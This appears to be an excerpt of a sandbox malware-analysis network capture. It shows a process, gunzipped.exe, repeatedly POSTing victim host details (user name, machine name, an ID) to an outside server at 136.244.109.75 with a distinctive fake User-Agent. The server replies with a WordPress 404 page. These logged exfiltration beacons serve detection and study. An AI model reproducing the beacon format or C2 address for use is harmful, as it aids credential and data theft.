Apr 17, 2024 03:18:35.518081903 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:35.518120050 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:35.518157959 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:35.518194914 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:35.518238068 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	49782	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:35.861537933 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:36.065365076 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:37.025995970 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:35 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:37.026061058 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:37.026099920 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:37.026138067 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:37.026180983 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:37.026217937 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:37.026257992 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:37.026294947 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:37.026333094 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:37.026376963 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	49783	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:37.366004944 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:37.573782921 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:38.553556919 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:37 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:38.553602934 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:38.553639889 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:38.553678036 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:38.553721905 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:38.553761005 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:38.553797960 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:38.553836107 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:38.553874016 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
